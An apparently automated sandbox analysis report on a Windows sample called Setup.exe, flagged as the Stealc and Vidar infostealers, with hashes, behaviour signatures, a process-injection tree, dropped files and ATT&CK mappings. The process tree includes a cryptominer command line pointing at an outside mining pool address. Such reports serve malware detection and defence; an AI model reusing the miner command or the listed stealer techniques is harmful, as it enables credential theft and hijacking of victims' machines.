Analysis

  • max time kernel
    157s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-06-2024 14:48

General

  • Target

    #!~#0PEn_9797_P@$SW0rd~!^!!$/Setup.exe

  • Size

    2.3MB

  • MD5

    5d52ef45b6e5bf144307a84c2af1581b

  • SHA1

    414a899ec327d4a9daa53983544245b209f25142

  • SHA256

    26a24d3b0206c6808615c7049859c2fe62c4dcd87e7858be40ae8112b0482616

  • SHA512

    458f47c1e4ccf41edaacc57abb663ee77ca098fffc596fad941bbdea67653aeabc79b34d607078b9ee5adb45614e26f5c28a09e8faf9532081fdd5dec9ac3c48

  • SSDEEP

    49152:DzO+g39FbI0eQf/Z3CarWedoYAmXviDTMtT2wkqN5K:DzO19Fnf/hdoYAm9ZkqN5K

Malware Config

Extracted

Family

stealc

rc4.plain

Signatures

  • Detect Vidar Stealer 10 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\netsh.exe
      C:\Windows\SysWOW64\netsh.exe
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Users\Admin\AppData\Local\Temp\dcom.au3
        C:\Users\Admin\AppData\Local\Temp\dcom.au3
        3⤵
        • Checks computer location settings
        • Loads dropped DLL
        • Checks processor information in registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4292
        • C:\ProgramData\DHDAKFCGIJ.exe
          "C:\ProgramData\DHDAKFCGIJ.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4704
          • C:\Windows\SysWOW64\ftp.exe
            C:\Windows\SysWOW64\ftp.exe
            5⤵
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:3636
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              6⤵
                PID:3720
          • C:\ProgramData\AFBAKKFCBF.exe
            "C:\ProgramData\AFBAKKFCBF.exe"
            4⤵
            • Suspicious use of SetThreadContext
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1280
            • C:\Windows\SysWOW64\ftp.exe
              C:\Windows\SysWOW64\ftp.exe
              5⤵
              • Suspicious use of SetThreadContext
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4112
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                6⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4500
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:4644
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4248 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:1596
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2916 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:3
        1⤵
          PID:112

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Persistence

        Event Triggered Execution

        1
        T1546

        Netsh Helper DLL

        1
        T1546.007

        Privilege Escalation

        Event Triggered Execution

        1
        T1546

        Netsh Helper DLL

        1
        T1546.007

        Defense Evasion

        Subvert Trust Controls

        1
        T1553

        Install Root Certificate

        1
        T1553.004

        Modify Registry

        1
        T1112

        Credential Access

        Unsecured Credentials

        4
        T1552

        Credentials In Files

        4
        T1552.001

        Discovery

        Query Registry

        3
        T1012

        System Information Discovery

        3
        T1082

        Collection

        Data from Local System

        4
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\AFBAKKFCBF.exe
          Filesize

          2.3MB

          MD5

          daaff76b0baf0a1f9cec253560c5db20

          SHA1

          0311cf0eeb4beddd2c69c6e97462595313a41e78

          SHA256

          5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c

          SHA512

          987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

        • C:\ProgramData\DHDAKFCGIJ.exe
          Filesize

          8.6MB

          MD5

          6cfddd5ce9ca4bb209bd5d8c2cd80025

          SHA1

          424da82e9edbb6b39a979ab97d84239a1d67c48b

          SHA256

          376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7

          SHA512

          d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

        • C:\ProgramData\HDGIEBGHDAEB\mozglue.dll
          Filesize

          593KB

          MD5

          c8fd9be83bc728cc04beffafc2907fe9

          SHA1

          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

          SHA256

          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

          SHA512

          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

        • C:\ProgramData\HDGIEBGHDAEB\nss3.dll
          Filesize

          2.0MB

          MD5

          1cc453cdf74f31e4d913ff9c10acdde2

          SHA1

          6e85eae544d6e965f15fa5c39700fa7202f3aafe

          SHA256

          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

          SHA512

          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
          Filesize

          2B

          MD5

          d751713988987e9331980363e24189ce

          SHA1

          97d170e1550eee4afc0af065b78cda302a97674c

          SHA256

          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

          SHA512

          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
          Filesize

          40B

          MD5

          20d4b8fa017a12a108c87f540836e250

          SHA1

          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

          SHA256

          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

          SHA512

          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

        • C:\Users\Admin\AppData\Local\Temp\30952b7c
          Filesize

          6.8MB

          MD5

          c72dbe62a344b8d98ae6fe1c28e7fb19

          SHA1

          0374c999e0f43dae3cc98c741f25761b29316ca7

          SHA256

          97a5b686037eaedcdfb2ad97529c830ef44a23d21092cfdfbe0c7281727bce84

          SHA512

          e50b5fd956793b0913f79921714de2bd021906b17b46a123e42a5dbe8dc4995a4c9cd2c30c3db0bd30404bbae3e4f7fc0270c11326d69613f36ad3c9407acf39

        • C:\Users\Admin\AppData\Local\Temp\58822b52
          Filesize

          1.1MB

          MD5

          8d443e7cb87cacf0f589ce55599e008f

          SHA1

          c7ff0475a3978271e0a8417ac4a826089c083772

          SHA256

          e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a

          SHA512

          c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

        • C:\Users\Admin\AppData\Local\Temp\58ce8638
          Filesize

          951KB

          MD5

          c62f812e250409fbd3c78141984270f2

          SHA1

          9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806

          SHA256

          d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8

          SHA512

          7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

        • C:\Users\Admin\AppData\Local\Temp\5a55639c
          Filesize

          1.1MB

          MD5

          24ee63d61846d5c681fd11bc175b8677

          SHA1

          85dd0289b1b9d2815db5824ad7b9b30a8b344f36

          SHA256

          5ba7fccb1d10ab49f67ee3bc798ec3526deb40884a25f284d53e35df06d19189

          SHA512

          63b83c530f118a7b7d2ca4aa3b72ea488a86447a100a046da1fc4b32a9a8c0d5addf195545db781c17cdfc92510d95960a12c341ca8ba3329851ea6825409c95

        • C:\Users\Admin\AppData\Local\Temp\5a757ad9
          Filesize

          736KB

          MD5

          038e252a69760e572c5d8195d91bed8e

          SHA1

          29b052cedbb9eec939a7cc26970dedf3f8251bab

          SHA256

          ea0c6eb3cdf3aade407c22e3a13c47b4942d61041ed59aa9f41100043aadb4b2

          SHA512

          24174e8cd3a02aa76f3fc35aa55e2a6aa412da294ce80b368c7d57edc5ac7f7e6ee002b3dd3d48ec517b74a500e270cb3efce3ceac4cf10c31e189b9199a066f

        • C:\Users\Admin\AppData\Local\Temp\dcom.au3
          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

        • memory/1280-155-0x0000000000D50000-0x0000000000F98000-memory.dmp
          Filesize

          2.3MB

        • memory/1280-164-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/1280-165-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/1280-177-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-16-0x0000000050310000-0x0000000050349000-memory.dmp
          Filesize

          228KB

        • memory/2144-15-0x0000000050120000-0x000000005030D000-memory.dmp
          Filesize

          1.9MB

        • memory/2144-17-0x00000000744F2000-0x00000000744F4000-memory.dmp
          Filesize

          8KB

        • memory/2144-19-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-18-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-10-0x0000000000400000-0x0000000000698000-memory.dmp
          Filesize

          2.6MB

        • memory/2144-0-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-12-0x0000000050000000-0x0000000050116000-memory.dmp
          Filesize

          1.1MB

        • memory/2144-14-0x0000000057000000-0x000000005703F000-memory.dmp
          Filesize

          252KB

        • memory/2144-13-0x0000000057800000-0x0000000057812000-memory.dmp
          Filesize

          72KB

        • memory/2144-11-0x0000000059800000-0x000000005986E000-memory.dmp
          Filesize

          440KB

        • memory/2144-1-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/2612-28-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2612-33-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2612-30-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/2612-32-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/3636-180-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4112-183-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/4112-181-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4112-195-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/4292-45-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-41-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4292-39-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-166-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-173-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-194-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-42-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-193-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-46-0x0000000061E00000-0x0000000061EF3000-memory.dmp
          Filesize

          972KB

        • memory/4292-123-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-182-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-140-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4500-202-0x0000000000400000-0x000000000040A000-memory.dmp
          Filesize

          40KB

        • memory/4704-162-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4704-174-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/4704-139-0x0000000000400000-0x0000000000913000-memory.dmp
          Filesize

          5.1MB

        • memory/4704-161-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB